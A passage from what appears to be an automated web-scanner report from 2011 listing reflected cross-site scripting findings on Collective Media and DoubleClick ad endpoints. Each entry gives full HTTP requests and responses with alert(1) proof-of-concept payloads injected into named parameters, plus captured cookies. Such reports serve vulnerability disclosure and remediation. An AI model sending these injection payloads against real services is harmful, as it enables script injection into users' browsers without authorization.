<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-72076114_1304957083","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_life46e4f'-alert(1)-'496a9811112;net=q1;u=,q1-72076114_1304957083,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;o
...[SNIP]...

2.20. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2c6'-alert(1)-'43692c066ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life;sz=1e2c6'-alert(1)-'43692c066ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Content-Length: 7494

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
/adj/q1.q.gc.6008/be_life;net=q1;u=,q1-27248253_1304957081,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=1e2c6'-alert(1)-'43692c066ec;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","1e2c6'-a
...[SNIP]...

2.21. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 162f2'-alert(1)-'2597d4b27e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj162f2'-alert(1)-'2597d4b27e5/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7543

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-49028478_1304957069","http://ad.doubleclick.net/adj162f2'-alert(1)-'2597d4b27e5/q1.q.gc.6008/life;net=q1;u=,q1-49028478_1304957069,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;
...[SNIP]...

2.22. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e106e'-alert(1)-'9233dd66208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008e106e'-alert(1)-'9233dd66208/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:30 GMT
Connection: close
Content-Length: 7535

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-55945961_1304957070","http://ad.doubleclick.net/adj/q1.q.gc.6008e106e'-alert(1)-'9233dd66208/life;net=q1;u=,q1-55945961_1304957070,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net
...[SNIP]...

2.23. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0e95'-alert(1)-'968894bb131 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/lifee0e95'-alert(1)-'968894bb131;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:30 GMT
Connection: close
Content-Length: 7535

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-40265891_1304957070","http://ad.doubleclick.net/adj/q1.q.gc.6008/lifee0e95'-alert(1)-'968894bb131;net=q1;u=,q1-40265891_1304957070,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;o
...[SNIP]...

2.24. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec4cd'-alert(1)-'5eba76a46b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/life;sz=ec4cd'-alert(1)-'5eba76a46b5 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7491

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
net/adj/q1.q.gc.6008/life;net=q1;u=,q1-76679238_1304957069,11f8f328940989e,none,q1.polit_h-q1.none_m-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=ec4cd'-alert(1)-'5eba76a46b5;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=q1.ent_h;btg=q1.food_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","ec4cd'-a
...[SNIP]...

2.25. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4493f"-alert(1)-"ec76f37ce0d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341724493f"-alert(1)-"ec76f37ce0d&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:16 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341724493f"-alert(1)-"ec76f37ce0d&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300
...[SNIP]...

2.26. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d95e'-alert(1)-'1b149a4c24f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341726d95e'-alert(1)-'1b149a4c24f&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:21 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341726d95e'-alert(1)-'1b149a4c24f&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300
...[SNIP]...

2.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84156"-alert(1)-"67294489f15 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574984156"-alert(1)-"67294489f15&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:42 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
r minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574984156"-alert(1)-"67294489f15&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

2.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82078'-alert(1)-'e5965931a94 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574982078'-alert(1)-'e5965931a94&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:46 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574982078'-alert(1)-'e5965931a94&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

2.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 508a1"-alert(1)-"1b007082072 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596508a1"-alert(1)-"1b007082072&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:59 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596508a1"-alert(1)-"1b007082072&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...

2.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3932e'-alert(1)-'d56046cbb6f was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f5963932e'-alert(1)-'d56046cbb6f&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:06:03 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
